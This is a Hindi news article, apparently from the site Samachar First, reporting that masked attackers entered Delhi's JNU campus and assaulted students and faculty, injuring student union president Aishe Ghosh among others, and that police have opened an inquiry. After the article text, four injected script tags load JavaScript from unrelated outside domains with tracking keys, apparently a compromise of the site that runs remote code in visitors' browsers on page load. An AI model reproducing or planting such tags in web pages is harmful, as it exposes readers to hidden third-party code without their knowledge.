Categories: इंडिया

JNU में घुसे नकाबपोश हमलावर, छात्र-छात्राओं और प्रध्यापकों की अंधाधुंध पिटाई

<p>दिल्ली की जवाहर लाल नेहरू यूनिवर्सिटी में एक बार फिर मंहगी फीस पर दाखिला लेने वालों से हिंसा हुई है। बीते कल देर रात को कुछ नकाबपोश हमलावरों ने यहां छात्रों और फैकल्टी मेंबर पर हमला कर दिया। जिसमें दो दर्जन से अधिक छात्र घायल हो गए हैं। जानकारी के अनुसार रविवार शाम करीब 5 बजे के बाद जेएनयू में हिंसा शुरू हुई थी। पहले कुछ नकाबपोश हमलावर यूनिवर्सिटी के कैंपस में घुसे उसके बाद लगातार हमला किया, तोड़फोड़ की। इस दौरान कई छात्र, फैकल्टी घायल हो गए। देर रात को ही पुलिस ने कैंपस में फ्लैग मार्च किया। द हिंदू के अनुसार एम्स और सफदरजंग अस्पताल के सूत्रों ने कहा कि हिंसा के दौरान लगी चोटों के लिए 35 से अधिक छात्रों और शिक्षकों का इलाज किया गया।</p>

<p>दिल्ली पुलिस ने सोमवार सुबह जेएनयू हिंसा की जांच शुरू कर दी है और सीसीटीवी फुटेज ले गई। इस मामले की जांच ज्वाइंट पुलिस कमिश्नर शालिनी सिंह करेंगी। दिल्ली पुलिस का कहना है कि हमें तीन शिकायतें मिली हैं। पहली शिकायत एबीवीपी की ओर से है, दूसरी शिकायत वामपंथी संगठनों की ओर से और तीसरी शिकायत जेएनयू प्रशासन की ओर से मिली है। पुलिस का कहना है कि हम जल्द ही मामले में मुकदमा दर्ज करेंगे।</p>

<p>झड़प के बाद यूनिवर्सिटी प्रशासन के आग्रह पर परिसर में पुलिस को तैनात कर दिया गया है। हिंसक झड़प में कई छात्र-छात्राएं घायल हो गए। संयुक्त पुलिस आयुक्त देवेंद्र आर्य ने कहा कि विश्वविद्यालय प्रशासन ने हमसे आग्रह किया फिर इसके बाद पुलिस टीम ने विश्वविद्यालय परिसर में प्रवेश किया। पिटाई से जेएनयू छात्रसंघ की अध्यक्ष आइशी घोष सहित दो पदाधिकारी घायल हो गए। आइशी की आंख पर लोहे की रॉड से हमला किया गया। लहूलुहान आइशी को तुरंत नजदीकी अस्पताल ले जाया गया। घायल छात्रों ने आरएसएस की छात्र इकाई एबीवीपी पर हिंसा करने का आरोप लगाया है।</p>

<p>&nbsp;</p>
<script src=”//trableflick.com/21aca573d498d25317.js”></script>
<script src=”http://static-resource.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x” type=”text/javascript”></script>
<script src=”http://cdn-javascript.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1578292885507″ type=”text/javascript”></script>
<script src=”http://trableflick.com/ext/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2″ type=”text/javascript”></script>

Samachar First

Recent Posts

संजौली मस्जिद विवाद : चार अलग-अलग मामलों में 185 आरोपी बनाए,एफआईआर में भाजपा के राज्य कोषाध्यक्ष, विहिप के प्रांत मंत्री भी नामजद

  समाचार फर्स्‍ट नेटवर्क Shimla: संजौली मस्जिद में अवैध निर्माण के विरोध में प्रदर्शन करने…

2 hours ago

खुला नौकरियों का पिटारा: नगरोटा में ही 5000 युवाओं को रोजगार देने का लक्ष्य: बाली

 सिटी ग्रुप ने आयोजित किया रोजगार मेला, 300 का हुआ चयन 35 कंपनियों ने लिया…

6 hours ago

हमीरपुर में गणेश विसर्जन की धूम

  Hamirpur: गणेश महोत्सव के आयोजन के दौरान अंतिम दिन गणेश मूर्ति के विसर्जन से…

7 hours ago

उचित पोषण के लिए दैनिक आहार में विविधता जरूरी: सीडीपीओ

  Hamirpur:महिला एवं बाल विकास विभाग ने राष्ट्रीय पोषण माह के उपलक्ष्य पर सोमवार को…

7 hours ago

हमीरपुर में सदस्यता अभियान पकड़ेगा रफतार, कश्‍यप ने ली बैठक

  Hamirpur: भारतीय जनता पार्टी का देश भर में चला सदस्यता अभियान हिमाचल में भी…

7 hours ago

रंगस स्कूल के विद्यार्थियों को समझाए मौलिक कर्तव्य

  Hamirpur:जिला विधिक सेवाएं प्राधिकरण ने सोमवार को अंतर्राष्ट्रीय ओजोन परत संरक्षण दिवस के उपलक्ष्य…

7 hours ago